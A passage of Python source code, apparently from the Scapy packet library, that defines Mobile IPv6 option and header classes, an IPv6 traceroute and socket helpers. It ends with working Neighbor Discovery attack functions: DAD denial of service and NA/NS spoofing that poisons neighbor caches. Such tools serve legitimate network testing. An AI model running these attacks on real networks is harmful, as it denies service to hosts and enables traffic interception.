return struct.pack("!H", self.id)
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = 'ICMPv6 Mobile Prefix Advertisement'
fields_desc = [ByteEnumField("type", 147, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id", None),
BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
XBitField("res", 0, 14)]
def hashret(self):
return struct.pack("!H", self.id)
def answers(self, other):
return isinstance(other, ICMPv6MPSol)
# Mobile IPv6 Options classes
_mobopttypes = {2: "Binding Refresh Advice",
3: "Alternate Care-of Address",
4: "Nonce Indices",
5: "Binding Authorization Data",
6: "Mobile Network Prefix (RFC3963)",
7: "Link-Layer Address (RFC4068)",
8: "Mobile Node Identifier (RFC4283)",
9: "Mobility Message Authentication (RFC4285)",
10: "Replay Protection (RFC4285)",
11: "CGA Parameters Request (RFC4866)",
12: "CGA Parameters (RFC4866)",
13: "Signature (RFC4866)",
14: "Home Keygen Token (RFC4866)",
15: "Care-of Test Init (RFC4866)",
16: "Care-of Test (RFC4866)"}
class _MIP6OptAlign(Packet):
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
This class is inherited by all MIPv6 options to help in computing the
required Padding for that option, i.e. the need for a Pad1 or PadN
option before it. They only need to provide x and y as class
parameters. (x=0 and y=0 are used when no alignment is required)"""
__slots__ = ["x", "y"]
def alignment_delta(self, curpos):
x = self.x
y = self.y
if x == 0 and y == 0:
return 0
delta = x * ((curpos - y + x - 1) // x) + y - curpos
return delta
def extract_padding(self, p):
return b"", p
class MIP6OptBRAdvice(_MIP6OptAlign):
name = 'Mobile IPv6 Option - Binding Refresh Advice'
fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
ByteField('olen', 2),
ShortField('rinter', 0)]
x = 2
y = 0 # alignment requirement: 2n
class MIP6OptAltCoA(_MIP6OptAlign):
name = 'MIPv6 Option - Alternate Care-of Address'
fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
ByteField('olen', 16),
IP6Field("acoa", "::")]
x = 8
y = 6 # alignment requirement: 8n+6
class MIP6OptNonceIndices(_MIP6OptAlign):
name = 'MIPv6 Option - Nonce Indices'
fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
ByteField('olen', 16),
ShortField('hni', 0),
ShortField('coni', 0)]
x = 2
y = 0 # alignment requirement: 2n
class MIP6OptBindingAuthData(_MIP6OptAlign):
name = 'MIPv6 Option - Binding Authorization Data'
fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
ByteField('olen', 16),
BitField('authenticator', 0, 96)]
x = 8
y = 2 # alignment requirement: 8n+2
class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
name = 'NEMO Option - Mobile Network Prefix'
fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
ByteField("olen", 18),
ByteField("reserved", 0),
ByteField("plen", 64),
IP6Field("prefix", "::")]
x = 8
y = 4 # alignment requirement: 8n+4
class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
ByteField("olen", 7),
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
ByteField("pad", 0),
MACField("lla", ETHER_ANY)] # Only support ethernet
x = 0
y = 0 # alignment requirement: none
class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
name = "MIPv6 Option - Mobile Node Identifier"
fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
FieldLenField("olen", None, length_of="id", fmt="B",
adjust=lambda pkt, x: x + 1),
ByteEnumField("subtype", 1, {1: "NAI"}),
StrLenField("id", "",
length_from=lambda pkt: pkt.olen - 1)]
x = 0
y = 0 # alignment requirement: none
# We only support decoding and basic build. Automatic HMAC computation is
# too much work for our current needs. It is left to the user (I mean ...
# you). --arno
class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
name = "MIPv6 Option - Mobility Message Authentication"
fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
FieldLenField("olen", None, length_of="authdata", fmt="B",
adjust=lambda pkt, x: x + 5),
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
2: "MN-AAA authentication mobility option"}), # noqa: E501
IntField("mspi", None),
StrLenField("authdata", "A" * 12,
length_from=lambda pkt: pkt.olen - 5)]
x = 4
y = 1 # alignment requirement: 4n+1
# Extracted from RFC 1305 (NTP) :
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
# in seconds relative to 0h on 1 January 1900. The integer part is in the
# first 32 bits and the fraction part in the last 32 bits.
class NTPTimestampField(LongField):
def i2repr(self, pkt, x):
if x < ((50 * 31536000) << 32):
return "Some date a few decades ago (%d)" % x
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
# January 1st 1970 :
delta = -2209075761
i = int(x >> 32)
j = float(x & 0xffffffff) * 2.0**-32
res = i + j + delta
t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
return "%s (%d)" % (t, x)
class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
name = "MIPv6 option - Replay Protection"
fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
ByteField("olen", 8),
NTPTimestampField("timestamp", 0)]
x = 8
y = 2 # alignment requirement: 8n+2
class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
name = "MIPv6 option - CGA Parameters Request"
fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
ByteField("olen", 0)]
x = 0
y = 0 # alignment requirement: none
# XXX TODO: deal with CGA param fragmentation and build of defragmented
# XXX version. Passing of a big CGAParam structure should be
# XXX simplified. Make it hold packets, by the way --arno
class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
name = "MIPv6 option - CGA Parameters"
fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
StrLenField("cgaparams", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
name = "MIPv6 option - Signature"
fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
FieldLenField("olen", None, length_of="sig", fmt="B"),
StrLenField("sig", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
name = "MIPv6 option - Home Keygen Token"
fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
FieldLenField("olen", None, length_of="hkt", fmt="B"),
StrLenField("hkt", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
name = "MIPv6 option - Care-of Test Init"
fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
ByteField("olen", 0)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
name = "MIPv6 option - Care-of Test"
fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
FieldLenField("olen", None, length_of="cokt", fmt="B"),
StrLenField("cokt", b'\x00' * 8,
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
class MIP6OptUnknown(_MIP6OptAlign):
name = 'Scapy6 - Unknown Mobility Option'
fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
FieldLenField("olen", None, length_of="odata", fmt="B"),
StrLenField("odata", "",
length_from=lambda pkt: pkt.olen)]
x = 0
y = 0 # alignment requirement: none
@classmethod
def dispatch_hook(cls, _pkt=None, *_, **kargs):
if _pkt:
o = orb(_pkt[0]) # Option type
if o in moboptcls:
return moboptcls[o]
return cls
moboptcls = {0: Pad1,
1: PadN,
2: MIP6OptBRAdvice,
3: MIP6OptAltCoA,
4: MIP6OptNonceIndices,
5: MIP6OptBindingAuthData,
6: MIP6OptMobNetPrefix,
7: MIP6OptLLAddr,
8: MIP6OptMNID,
9: MIP6OptMsgAuth,
10: MIP6OptReplayProtection,
11: MIP6OptCGAParamsReq,
12: MIP6OptCGAParams,
13: MIP6OptSignature,
14: MIP6OptHomeKeygenToken,
15: MIP6OptCareOfTestInit,
16: MIP6OptCareOfTest}
# Main Mobile IPv6 Classes
mhtypes = {0: 'BRR',
1: 'HoTI',
2: 'CoTI',
3: 'HoT',
4: 'CoT',
5: 'BU',
6: 'BA',
7: 'BE',
8: 'Fast BU',
9: 'Fast BA',
10: 'Fast NA'}
# From http://www.iana.org/assignments/mobility-parameters
bastatus = {0: 'Binding Update accepted',
1: 'Accepted but prefix discovery necessary',
128: 'Reason unspecified',
129: 'Administratively prohibited',
130: 'Insufficient resources',
131: 'Home registration not supported',
132: 'Not home subnet',
133: 'Not home agent for this mobile node',
134: 'Duplicate Address Detection failed',
135: 'Sequence number out of window',
136: 'Expired home nonce index',
137: 'Expired care-of nonce index',
138: 'Expired nonces',
139: 'Registration type change disallowed',
140: 'Mobile Router Operation not permitted',
141: 'Invalid Prefix',
142: 'Not Authorized for Prefix',
143: 'Forwarding Setup failed (prefixes missing)',
144: 'MIPV6-ID-MISMATCH',
145: 'MIPV6-MESG-ID-REQD',
146: 'MIPV6-AUTH-FAIL',
147: 'Permanent home keygen token unavailable',
148: 'CGA and signature verification failed',
149: 'Permanent home keygen token exists',
150: 'Non-null home nonce index expected'}
class _MobilityHeader(Packet):
name = 'Dummy IPv6 Mobility Header'
overload_fields = {IPv6: {"nh": 135}}
def post_build(self, p, pay):
p += pay
tmp_len = self.len
if self.len is None:
tmp_len = (len(p) - 8) // 8
p = p[:1] + struct.pack("B", tmp_len) + p[2:]
if self.cksum is None:
cksum = in6_chksum(135, self.underlayer, p)
else:
cksum = self.cksum
p = p[:4] + struct.pack("!H", cksum) + p[6:]
return p
class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
name = "IPv6 Mobility Header - Generic Message"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", None, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrLenField("msg", b"\x00" * 2,
length_from=lambda pkt: 8 * pkt.len - 6)]
class MIP6MH_BRR(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Refresh Request"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 0, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("res2", None),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 8,
length_from=lambda pkt: 8 * pkt.len)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
# Hack: BRR, BU and BA have the same hashret that returns the same
# value b"\x00\x08\x09" (concatenation of mhtypes). This is
# because we need match BA with BU and BU with BRR. --arno
return b"\x00\x08\x09"
class MIP6MH_HoTI(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test Init"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 1, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
StrFixedLenField("reserved", b"\x00" * 2, 2),
StrFixedLenField("cookie", b"\x00" * 8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 16,
length_from=lambda pkt: 8 * (pkt.len - 1))]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
return bytes_encode(self.cookie)
class MIP6MH_CoTI(MIP6MH_HoTI):
name = "IPv6 Mobility Header - Care-of Test Init"
mhtype = 2
def hashret(self):
return bytes_encode(self.cookie)
class MIP6MH_HoT(_MobilityHeader):
name = "IPv6 Mobility Header - Home Test"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteEnumField("mhtype", 3, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ShortField("index", None),
StrFixedLenField("cookie", b"\x00" * 8, 8),
StrFixedLenField("token", b"\x00" * 8, 8),
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 24,
length_from=lambda pkt: 8 * (pkt.len - 2))]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self):
return bytes_encode(self.cookie)
def answers(self, other):
if (isinstance(other, MIP6MH_HoTI) and
self.cookie == other.cookie):
return 1
return 0
class MIP6MH_CoT(MIP6MH_HoT):
name = "IPv6 Mobility Header - Care-of Test"
mhtype = 4
def hashret(self):
return bytes_encode(self.cookie)
def answers(self, other):
if (isinstance(other, MIP6MH_CoTI) and
self.cookie == other.cookie):
return 1
return 0
class LifetimeField(ShortField):
def i2repr(self, pkt, x):
return "%d sec" % (4 * x)
class MIP6MH_BU(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Update"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 5, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
XShortField("seq", None), # TODO: ShortNonceField
FlagsField("flags", "KHA", 7, "PRMKLHA"),
XBitField("reserved", 0, 9),
LifetimeField("mhtime", 3), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 12,
length_from=lambda pkt: 8 * pkt.len - 4)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if isinstance(other, MIP6MH_BRR):
return 1
return 0
class MIP6MH_BA(_MobilityHeader):
name = "IPv6 Mobility Header - Binding ACK"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 6, mhtypes),
ByteField("res", None),
XShortField("cksum", None),
ByteEnumField("status", 0, bastatus),
FlagsField("flags", "K", 3, "PRK"),
XBitField("res2", None, 5),
XShortField("seq", None), # TODO: ShortNonceField
XShortField("mhtime", 0), # unit == 4 seconds
_PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
_OptionsField("options", [], MIP6OptUnknown, 12,
length_from=lambda pkt: 8 * pkt.len - 4)]
overload_fields = {IPv6: {"nh": 135}}
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
return b"\x00\x08\x09"
def answers(self, other):
if (isinstance(other, MIP6MH_BU) and
other.mhtype == 5 and
self.mhtype == 6 and
other.flags & 0x1 and # Ack request flags is set
self.seq == other.seq):
return 1
return 0
_bestatus = {1: 'Unknown binding for Home Address destination option',
2: 'Unrecognized MH Type value'}
# TODO: match Binding Error to its stimulus
class MIP6MH_BE(_MobilityHeader):
name = "IPv6 Mobility Header - Binding Error"
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
ByteEnumField("mhtype", 7, mhtypes),
ByteField("res", 0),
XShortField("cksum", None),
ByteEnumField("status", 0, _bestatus),
ByteField("reserved", 0),
IP6Field("ha", "::"),
_OptionsField("options", [], MIP6OptUnknown, 24,
length_from=lambda pkt: 8 * (pkt.len - 2))]
overload_fields = {IPv6: {"nh": 135}}
_mip6_mhtype2cls = {0: MIP6MH_BRR,
1: MIP6MH_HoTI,
2: MIP6MH_CoTI,
3: MIP6MH_HoT,
4: MIP6MH_CoT,
5: MIP6MH_BU,
6: MIP6MH_BA,
7: MIP6MH_BE}
#############################################################################
#############################################################################
# Traceroute6 #
#############################################################################
#############################################################################
class AS_resolver6(AS_resolver_riswhois):
def _resolve_one(self, ip):
"""
overloaded version to provide a Whois resolution on the
embedded IPv4 address if the address is 6to4 or Teredo.
Otherwise, the native IPv6 address is passed.
"""
if in6_isaddr6to4(ip): # for 6to4, use embedded @
tmp = inet_pton(socket.AF_INET6, ip)
addr = inet_ntop(socket.AF_INET, tmp[2:6])
elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
addr = teredoAddrExtractInfo(ip)[2]
else:
addr = ip
_, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
if asn.startswith("AS"):
try:
asn = int(asn[2:])
except ValueError:
pass
return ip, asn, desc
class TracerouteResult6(TracerouteResult):
__slots__ = []
def show(self):
return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
s.hlim,
r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
"{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
"{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
"{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
def get_trace(self):
trace = {}
for s, r in self.res:
if IPv6 not in s:
continue
d = s[IPv6].dst
if d not in trace:
trace[d] = {}
t = not (ICMPv6TimeExceeded in r or
ICMPv6DestUnreach in r or
ICMPv6PacketTooBig in r or
ICMPv6ParamProblem in r)
trace[d][s[IPv6].hlim] = r[IPv6].src, t
for k in six.itervalues(trace):
try:
m = min(x for x, y in six.iteritems(k) if y[1])
except ValueError:
continue
for li in list(k): # use list(): k is modified in the loop
if li > m:
del k[li]
return trace
def graph(self, ASres=AS_resolver6(), **kargs):
TracerouteResult.graph(self, ASres=ASres, **kargs)
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
l4=None, timeout=2, verbose=None, **kargs):
"""Instant TCP traceroute using IPv6
traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
"""
if verbose is None:
verbose = conf.verb
if l4 is None:
a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
else:
a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
timeout=timeout, verbose=verbose, **kargs)
a = TracerouteResult6(a.res)
if verbose:
a.show()
return a, b
#############################################################################
#############################################################################
# Sockets #
#############################################################################
#############################################################################
class L3RawSocket6(L3RawSocket):
def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
# NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
self.iface = iface
def IPv6inIP(dst='203.178.135.36', src=None):
_IPv6inIP.dst = dst
_IPv6inIP.src = src
if not conf.L3socket == _IPv6inIP:
_IPv6inIP.cls = conf.L3socket
else:
del(conf.L3socket)
return _IPv6inIP
class _IPv6inIP(SuperSocket):
dst = '127.0.0.1'
src = None
cls = None
def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
SuperSocket.__init__(self, family, type, proto)
self.worker = self.cls(**args)
def set(self, dst, src=None):
_IPv6inIP.src = src
_IPv6inIP.dst = dst
def nonblock_recv(self):
p = self.worker.nonblock_recv()
return self._recv(p)
def recv(self, x):
p = self.worker.recv(x)
return self._recv(p, x)
def _recv(self, p, x=MTU):
if p is None:
return p
elif isinstance(p, IP):
# TODO: verify checksum
if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
if isinstance(p.payload, IPv6):
return p.payload
return p
def send(self, x):
return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
#############################################################################
#############################################################################
# Neighbor Discovery Protocol Attacks #
#############################################################################
#############################################################################
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
tgt_filter=None, reply_mac=None):
"""
Internal generic helper accepting a specific callback as first argument,
for NS or NA reply. See the two specific functions below.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
# Get and compare the MAC address
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must be the unspecified address
if req[IPv6].src != "::":
return 0
# Check destination is the link-local solicited-node multicast
# address associated with target address in received NS
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
return 0
return 1
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, iface),
iface=iface)
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages sent from the
unspecified address and sending a NS reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NS sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the unspecified address (::).
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
"""
def ns_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS by sending a similar NS
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
sendp(rep, iface=iface, verbose=0)
print("Reply NS for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
"""
Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
"""
def na_reply_callback(req, reply_mac, iface):
"""
Callback that reply to a NS with a NA
"""
# Let's build a reply and send it
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac)
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination macs address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
# Use the target field from the NS
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = 1 if router else 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface)
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
dst=None, src_mac=None, dst_mac=None, loop=True,
inter=1, iface=None):
"""
The main purpose of this function is to send fake Neighbor Solicitations
messages to a victim, in order to either create a new entry in its neighbor
cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated
that a node SHOULD create the entry or update an existing one (if it is not
currently performing DAD for the target of the NS). The entry's reachability # noqa: E501
state is set to STALE.
The two main parameters of the function are the source link-layer address
(carried by the Source Link-Layer Address option in the NS) and the
source address of the packet.
Unlike some other NDP_Attack_* function, this one is not based on a
